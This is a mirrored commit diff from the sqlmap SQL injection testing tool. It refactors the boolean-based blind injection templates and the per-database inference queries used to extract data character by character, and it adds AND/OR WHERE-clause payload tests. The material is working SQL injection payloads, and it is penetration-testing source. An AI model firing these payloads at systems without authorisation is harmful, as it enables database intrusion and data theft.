mirror of
https://github.com/sqlmapproject/sqlmap.git
synced 2024-11-22 09:36:35 +03:00
Minor code refactoring and finally make exploitation work also on OR boolean-based injections
This commit is contained in:
parent
7a5cd3b35f
commit
41e1b95c6c
|
@ -213,9 +213,7 @@ class Agent:
|
|||
payload = payload.replace("[ORIGVALUE]", origvalue)
|
||||
|
||||
if kb.dbms is not None:
|
||||
# NOTE: ugly hack due to queries.xml's <inference> tag
|
||||
# starting with 'AND ' string
|
||||
inferenceQuery = queries[kb.dbms].inference.query[4:]
|
||||
inferenceQuery = queries[kb.dbms].inference.query
|
||||
payload = payload.replace("[INFERENCE]", inferenceQuery)
|
||||
|
||||
return payload
|
||||
|
|
|
@ -402,6 +402,7 @@ Formats:
|
|||
<risk>1</risk>
|
||||
<clause>1</clause>
|
||||
<where>1</where>
|
||||
<vector>AND [INFERENCE]</vector>
|
||||
<request>
|
||||
<payload>AND [RANDNUM]=[RANDNUM]</payload>
|
||||
</request>
|
||||
|
@ -410,6 +411,40 @@ Formats:
|
|||
</response>
|
||||
</test>
|
||||
|
||||
<test>
|
||||
<title>AND boolean-based blind - WHERE clause (MySQL comment)</title>
|
||||
<stype>1</stype>
|
||||
<level>4</level>
|
||||
<risk>1</risk>
|
||||
<clause>1</clause>
|
||||
<where>1</where>
|
||||
<vector>AND [INFERENCE]</vector>
|
||||
<request>
|
||||
<payload>AND [RANDNUM]=[RANDNUM]</payload>
|
||||
<comment>#</comment>
|
||||
</request>
|
||||
<response>
|
||||
<comparison>AND [RANDNUM]=[RANDNUM1]</comparison>
|
||||
</response>
|
||||
</test>
|
||||
|
||||
<test>
|
||||
<title>AND boolean-based blind - WHERE clause (Generic comment)</title>
|
||||
<stype>1</stype>
|
||||
<level>4</level>
|
||||
<risk>1</risk>
|
||||
<clause>1</clause>
|
||||
<where>1</where>
|
||||
<vector>AND [INFERENCE]</vector>
|
||||
<request>
|
||||
<payload>AND [RANDNUM]=[RANDNUM]</payload>
|
||||
<comment>--</comment>
|
||||
</request>
|
||||
<response>
|
||||
<comparison>AND [RANDNUM]=[RANDNUM1]</comparison>
|
||||
</response>
|
||||
</test>
|
||||
|
||||
<test>
|
||||
<title>OR boolean-based blind - WHERE clause</title>
|
||||
<stype>1</stype>
|
||||
|
@ -417,6 +452,7 @@ Formats:
|
|||
<risk>3</risk>
|
||||
<clause>1</clause>
|
||||
<where>2</where>
|
||||
<vector>OR [INFERENCE]</vector>
|
||||
<request>
|
||||
<payload>OR [RANDNUM]=[RANDNUM1]</payload>
|
||||
</request>
|
||||
|
@ -432,6 +468,7 @@ Formats:
|
|||
<risk>3</risk>
|
||||
<clause>1</clause>
|
||||
<where>2</where>
|
||||
<vector>OR [INFERENCE]</vector>
|
||||
<request>
|
||||
<payload>OR [RANDNUM]=[RANDNUM1]</payload>
|
||||
<comment>#</comment>
|
||||
|
@ -451,6 +488,7 @@ Formats:
|
|||
<risk>3</risk>
|
||||
<clause>1</clause>
|
||||
<where>2</where>
|
||||
<vector>OR [INFERENCE]</vector>
|
||||
<request>
|
||||
<payload>OR [RANDNUM]=[RANDNUM1]</payload>
|
||||
<comment>--</comment>
|
||||
|
@ -488,7 +526,7 @@ Formats:
|
|||
<risk>1</risk>
|
||||
<clause>2,3</clause>
|
||||
<where>3</where>
|
||||
<vector>(SELECT (CASE WHEN (ORD(MID((%s), %d, 1)) > %d) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM information_schema.tables) END))</vector>
|
||||
<vector>(SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM information_schema.tables) END))</vector>
|
||||
<request>
|
||||
<payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM information_schema.tables) END))</payload>
|
||||
</request>
|
||||
|
@ -508,7 +546,7 @@ Formats:
|
|||
<risk>1</risk>
|
||||
<clause>2,3</clause>
|
||||
<where>3</where>
|
||||
<vector>(SELECT (CASE WHEN (ORD(MID((%s), %d, 1)) > %d) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END))</vector>
|
||||
<vector>(SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END))</vector>
|
||||
<request>
|
||||
<payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END))</payload>
|
||||
</request>
|
||||
|
@ -527,7 +565,7 @@ Formats:
|
|||
<risk>1</risk>
|
||||
<clause>3</clause>
|
||||
<where>3</where>
|
||||
<vector>(SELECT (CASE WHEN (ASCII(SUBSTRING((%s), %d, 1)) > %d) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END))</vector>
|
||||
<vector>(SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END))</vector>
|
||||
<request>
|
||||
<payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END))</payload>
|
||||
</request>
|
||||
|
@ -546,7 +584,7 @@ Formats:
|
|||
<risk>1</risk>
|
||||
<clause>3</clause>
|
||||
<where>3</where>
|
||||
<vector>(SELECT (CASE WHEN (ASCII(SUBSTR((%s), %d, 1)) > %d) THEN [ORIGVALUE] ELSE 1/0 END) FROM DUAL)</vector>
|
||||
<vector>(SELECT (CASE WHEN ([INFERENCE]) > %d) THEN [ORIGVALUE] ELSE 1/0 END) FROM DUAL)</vector>
|
||||
<request>
|
||||
<payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE 1/0 END) FROM DUAL)</payload>
|
||||
</request>
|
||||
|
@ -586,7 +624,7 @@ Formats:
|
|||
<risk>1</risk>
|
||||
<clause>2,3</clause>
|
||||
<where>1</where>
|
||||
<vector>, (SELECT (CASE WHEN (ORD(MID((%s), %d, 1)) > %d) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM information_schema.tables) END))</vector>
|
||||
<vector>, (SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM information_schema.tables) END))</vector>
|
||||
<request>
|
||||
<payload>, (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM information_schema.tables) END))</payload>
|
||||
</request>
|
||||
|
@ -606,7 +644,7 @@ Formats:
|
|||
<risk>1</risk>
|
||||
<clause>2,3</clause>
|
||||
<where>1</where>
|
||||
<vector>, (SELECT (CASE WHEN (ORD(MID((%s), %d, 1)) > %d) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END))</vector>
|
||||
<vector>, (SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END))</vector>
|
||||
<request>
|
||||
<payload>, (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END))</payload>
|
||||
</request>
|
||||
|
@ -625,7 +663,7 @@ Formats:
|
|||
<risk>1</risk>
|
||||
<clause>3</clause>
|
||||
<where>1</where>
|
||||
<vector>, (SELECT (CASE WHEN (ASCII(SUBSTRING((%s), %d, 1)) > %d) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END))</vector>
|
||||
<vector>, (SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END))</vector>
|
||||
<request>
|
||||
<payload>, (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END))</payload>
|
||||
</request>
|
||||
|
@ -644,7 +682,7 @@ Formats:
|
|||
<risk>1</risk>
|
||||
<clause>3</clause>
|
||||
<where>1</where>
|
||||
<vector>, (SELECT (CASE WHEN (ASCII(SUBSTR((%s), %d, 1)) > %d) THEN [ORIGVALUE] ELSE 1/0 END) FROM DUAL)</vector>
|
||||
<vector>, (SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE 1/0 END) FROM DUAL)</vector>
|
||||
<request>
|
||||
<payload>, (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE 1/0 END) FROM DUAL)</payload>
|
||||
</request>
|
||||
|
|
|
@ -24,7 +24,7 @@
|
|||
<timedelay query="SELECT SLEEP(%d)" query2="SELECT BENCHMARK(5000000, MD5('%d'))"/>
|
||||
<substring query="MID((%s), %d, %d)"/>
|
||||
<case query="SELECT (CASE WHEN (%s) THEN 1 ELSE 0 END)"/>
|
||||
<inference query="AND ORD(MID((%s), %d, 1)) > %d"/>
|
||||
<inference query="ORD(MID((%s), %d, 1)) > %d"/>
|
||||
<banner query="VERSION()"/>
|
||||
<current_user query="CURRENT_USER()"/>
|
||||
<current_db query="DATABASE()"/>
|
||||
|
@ -96,7 +96,7 @@
|
|||
<timedelay query="SELECT PG_SLEEP(%d)" query2="SELECT 'sqlmap' WHERE exists(SELECT * FROM generate_series(1, 300000%d))" query3="CREATE OR REPLACE FUNCTION sleep(int) RETURNS int AS '/lib/libc.so.6', 'sleep' language 'C' STRICT; SELECT sleep(%d)"/>
|
||||
<substring query="SUBSTR((%s)::text, %d, %d)"/>
|
||||
<case query="SELECT (CASE WHEN (%s) THEN 1 ELSE 0 END)"/>
|
||||
<inference query="AND ASCII(SUBSTR((%s)::text, %d, 1)) > %d"/>
|
||||
<inference query="ASCII(SUBSTR((%s)::text, %d, 1)) > %d"/>
|
||||
<banner query="SELECT VERSION()"/>
|
||||
<current_user query="SELECT CURRENT_USER"/>
|
||||
<current_db query="SELECT CURRENT_DATABASE()"/>
|
||||
|
@ -162,7 +162,7 @@
|
|||
<timedelay query="WAITFOR DELAY '0:0:%d'"/>
|
||||
<substring query="SUBSTRING((%s), %d, %d)"/>
|
||||
<case query="SELECT (CASE WHEN (%s) THEN '1' ELSE '0' END)"/>
|
||||
<inference query="AND ASCII(SUBSTRING((%s), %d, 1)) > %d"/>
|
||||
<inference query="ASCII(SUBSTRING((%s), %d, 1)) > %d"/>
|
||||
<banner query="SELECT @@VERSION"/>
|
||||
<current_user query="SELECT SYSTEM_USER"/>
|
||||
<current_db query="SELECT DB_NAME()"/>
|
||||
|
@ -226,7 +226,7 @@
|
|||
<timedelay query="BEGIN DBMS_LOCK.SLEEP(%d); END" query2="EXEC DBMS_LOCK.SLEEP(%d.00)" query3="EXEC USER_LOCK.SLEEP(%d.00)"/>
|
||||
<substring query="SUBSTR((%s), %d, %d)"/>
|
||||
<case query="SELECT (CASE WHEN (%s) THEN 1 ELSE 0 END) FROM DUAL"/>
|
||||
<inference query="AND ASCII(SUBSTR((%s), %d, 1)) > %d"/>
|
||||
<inference query="ASCII(SUBSTR((%s), %d, 1)) > %d"/>
|
||||
<banner query="SELECT banner FROM v$version WHERE ROWNUM=1"/>
|
||||
<current_user query="SELECT USER FROM DUAL"/>
|
||||
<current_db query="SELECT SYS.DATABASE_NAME FROM DUAL"/>
|
||||
|
@ -306,7 +306,7 @@
|
|||
<timedelay query="SELECT LIKE('ABCDEFG', UPPER(HEX(RANDOMBLOB(1000000%d))))"/>
|
||||
<substring query="SUBSTR((%s), %d, %d)"/>
|
||||
<case query="SELECT (CASE WHEN (%s) THEN 1 ELSE 0 END)"/>
|
||||
<inference query="AND SUBSTR((%s), %d, 1) > '%s'"/>
|
||||
<inference query="SUBSTR((%s), %d, 1) > '%s'"/>
|
||||
<banner query="SELECT SQLITE_VERSION()"/>
|
||||
<current_user/>
|
||||
<current_db/>
|
||||
|
@ -353,7 +353,7 @@
|
|||
<banner/>
|
||||
<current_user query="SELECT CURRENTUSER()"/>
|
||||
<current_db/>
|
||||
<inference query="AND ASC(MID((%s), %d, 1)) > %d"/>
|
||||
<inference query="ASC(MID((%s), %d, 1)) > %d"/>
|
||||
<is_dba query="IIF(CURRENTUSER()='Admin',1,0)"/>
|
||||
<dbs/>
|
||||
<tables>
|
||||
|
@ -389,7 +389,7 @@
|
|||
<inband query="SELECT DISTINCT RDB$USER FROM RDB$USER_PRIVILEGES"/>
|
||||
<blind query="SELECT FIRST 1 SKIP %d DISTINCT(RDB$USER) FROM RDB$USER_PRIVILEGES" count="SELECT COUNT(DISTINCT(RDB$USER)) FROM RDB$USER_PRIVILEGES"/>
|
||||
</users>
|
||||
<inference query="AND ASCII_VAL(SUBSTRING((%s) FROM %d FOR 1)) > %d"/>
|
||||
<inference query="ASCII_VAL(SUBSTRING((%s) FROM %d FOR 1)) > %d"/>
|
||||
<is_dba query="CURRENT_USER='SYSDBA'"/>
|
||||
<tables>
|
||||
<inband query="SELECT RDB$RELATION_NAME FROM RDB$RELATIONS WHERE RDB$VIEW_BLR IS NULL AND (RDB$SYSTEM_FLAG IS NULL OR RDB$SYSTEM_FLAG = 0)"/>
|
||||
|
@ -432,7 +432,7 @@
|
|||
<current_db query="SELECT DATABASE() FROM DUAL"/>
|
||||
<order query="ORDER BY %s ASC"/>
|
||||
<case query="SELECT (CASE WHEN (%s) THEN 1 ELSE 0 END)"/>
|
||||
<inference query="AND SUBSTR((%s), %d, 1) > '%s'"/>
|
||||
<inference query="SUBSTR((%s), %d, 1) > '%s'"/>
|
||||
<delimiter query=","/>
|
||||
<substring query="SUBSTR((%s), %d, %d)"/>
|
||||
<users>
|
||||
|
@ -473,7 +473,7 @@
|
|||
<timedelay query="WAITFOR DELAY '0:0:%d'"/>
|
||||
<substring query="SUBSTRING((%s), %d, %d)"/>
|
||||
<case query="SELECT (CASE WHEN (%s) THEN '1' ELSE '0' END)"/>
|
||||
<inference query="AND ASCII(SUBSTRING((%s), %d, 1)) > %d"/>
|
||||
<inference query="ASCII(SUBSTRING((%s), %d, 1)) > %d"/>
|
||||
<banner query="SELECT @@VERSION"/>
|
||||
<current_user query="SELECT SUSER_NAME()"/>
|
||||
<current_db query="SELECT DB_NAME()"/>
|
||||
|
|
Loading…
Reference in New Issue
Block a user